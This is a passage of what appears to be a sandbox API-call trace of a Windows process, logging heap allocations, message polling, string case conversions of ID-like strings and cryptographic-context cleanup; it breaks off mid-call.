0x34aaac0 [0258.633] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.633] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.633] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.639] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.639] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.639] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.643] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.643] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.644] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0258.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0258.644] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0258.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.644] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.644] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.644] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.645] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.645] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.645] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0258.645] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0258.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.646] CryptDestroyKey (hKey=0xaa5760) returned 1 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0258.646] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.646] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.646] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.646] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.647] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.647] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.647] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.647] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.647] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.647] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.648] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.648] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.648] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.648] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0258.649] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.649] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0258.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.649] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0258.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.649] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0258.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.649] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0258.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.649] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.649] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.650] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.650] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.650] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0258.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.650] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.651] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.652] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.652] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.653] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0258.653] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0258.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0258.654] FreeLibrary (hLibModule=0x74d40000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.654] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.654] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, 